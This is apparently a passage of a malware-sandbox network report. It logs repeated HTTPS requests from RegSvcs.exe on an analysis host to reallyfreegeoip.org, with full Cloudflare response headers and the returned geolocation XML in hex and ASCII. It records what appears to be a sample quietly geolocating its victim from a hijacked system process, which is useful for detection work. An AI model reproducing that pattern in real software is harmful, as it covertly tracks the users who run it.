                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449731104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:35 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:35 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845984
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x69B9p35gcXjmg%2F6PgYAY%2BPDI5nvLhxbaZi8Es7oY6MQ8SBv%2BUF0cZGfzYEVTN4dNLAYjzWm%2FejyBVdhba%2FYcC6SVK9LGNgyDjutGn%2BRyCgXr8tgOyG4ttkyopYYPucCI4JpxrTf"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7cc5ecb3c358-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1616&rtt_var=625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1725768&cwnd=155&unsent_bytes=0&cid=1bcddfabbab7d8ad&ts=225&x=0"
                                                                                                          2025-01-10 17:46:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449732104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:36 UTC857INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:36 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845985
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBZ%2FMZsEgwiAP8jBgqcqgVwiSE3EtpElVYsptYoZKioeOnl1n0wb%2Buvpm6B0%2FRXtghHKoonYFW9MRrLQImCcAITonWJQ65EiVEhB9Hjf%2BcTYU60MEWmWUboYar8uUhjmgjB4OXga"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7ccb5dee42e9-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1759&rtt_var=662&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1651583&cwnd=240&unsent_bytes=0&cid=3005a3016afd0cde&ts=163&x=0"
                                                                                                          2025-01-10 17:46:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449734104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:37 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:38 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:37 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845987
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcZp%2Fi6sg8uWGZGmINd1jAomkR5xRnQ%2BzjWYpt94vKepejq%2F2oZwBrSyENBFR8mnh%2Bfxknms6UR40UA%2BMsTuSkyM5Whbz0rjo%2Bfwj8UUy35CLPrCe2DUsLZo89C1ID4I4nPXxWAm"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7cd35fd5de95-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1607&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1801357&cwnd=243&unsent_bytes=0&cid=09f090f0e20c470e&ts=152&x=0"
                                                                                                          2025-01-10 17:46:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449736104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:39 UTC864INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:39 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845988
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYjHb1LpuSeOYzA6fDvvrDWl%2Bp20I6t9T9tWDfgMWO9NrIl0n3QPAX14C9JzSpsQhOSVbj0%2Fo5JGx1qmMb4q4K%2BjEriK3nZwXJ0Q70i%2FYVGZ9Xa0caHa2zSKsD3ttIg%2Fhe1j%2Fq%2Bi"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7cdbaee2c358-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2280&min_rtt=1751&rtt_var=1034&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1667618&cwnd=155&unsent_bytes=0&cid=d664ea9dc07997be&ts=156&x=0"
                                                                                                          2025-01-10 17:46:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449738104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:40 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:40 UTC859INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:40 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845989
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGvxZyGup5wszibbIJ8rXnc3VNHa0JdZ1SNEUG6YXs3Lcj9Nu0T28w8JxJp%2BPMop%2Fc5CmazfL2E9ti7qoi7Ne3fJUWri9JA1BtOGAZtsWY%2F1EsuRm3JRgTg%2FLq6R8toF5ZZxn%2BwY"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7ce3cccd7c6a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=2047&rtt_var=792&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1426477&cwnd=218&unsent_bytes=0&cid=b3303c2c95b03940&ts=167&x=0"
                                                                                                          2025-01-10 17:46:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449740104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:41 UTC857INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:41 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845991
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOrU2Y4TAKSyHvz5N91mkyJg9yunStCfT3iLh8A5AZSG8kVpk%2Fuop8WYgUEyjcZHwMlbV9NEQE5w6h0Dku4rauSp%2FkYEw0OiE%2F13%2Bn8SWJFuGoNGG9EA4yFrlwbo7RIoS88dbyYe"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7cebeb2e8ca1-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2011&rtt_var=825&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1272885&cwnd=168&unsent_bytes=0&cid=8555f841dd48f10a&ts=176&x=0"
                                                                                                          2025-01-10 17:46:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449742104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:43 UTC851INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:43 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845992
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bF21dJjdpxTLId7taQlD7nK5N3pz8%2FZnvaRQEkKofEqaPVYKszgC2aEdg7t2WBlmPv0niPe3ZKRfrgfTxKlhV6rPXnHvBrC6U6etITa61GuWrGwn23k6Sau51Gfs2YdnHiNg2Qs5"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7cf46d1f8ca1-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2103&rtt_var=1051&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=113266&cwnd=168&unsent_bytes=0&cid=d316d43a117c8a86&ts=187&x=0"
                                                                                                          2025-01-10 17:46:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449745104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:44 UTC867INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:44 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845993
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WZ4vYg18pna2Me0WeE%2F%2FPT%2FehZ9Y8SieB%2FqJsdddIpyTuj%2BTcEdqtM%2FhSeXnMEce4IZK%2FwLH3bVswQ3w1m0ze4L7Jf480wtvUdrnVFciQR4%2FNNstNLz%2B5aF7yUvIm0ZGYhToiZM"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7cfce815de95-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1644&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1631284&cwnd=243&unsent_bytes=0&cid=ab81282d736ba1ea&ts=149&x=0"
                                                                                                          2025-01-10 17:46:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449749104.21.64.14433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:45 UTC855INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:45 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1845995
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzgyKVED%2Fl6HnsUKg7A64otMlm0gDrb8X8%2BeXn4qk73X1EPFFzJVK06CfCqsOupztsD9qFZe0HPMch5cyOw0ZxMCdTobhZIedmkTv7iFYgndkbj9dc4NKAMCS7qLqGWE%2F8nkEJIt"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d04fda37c6a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1969&rtt_var=796&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1326669&cwnd=218&unsent_bytes=0&cid=fac4f172ee08b4c0&ts=151&x=0"
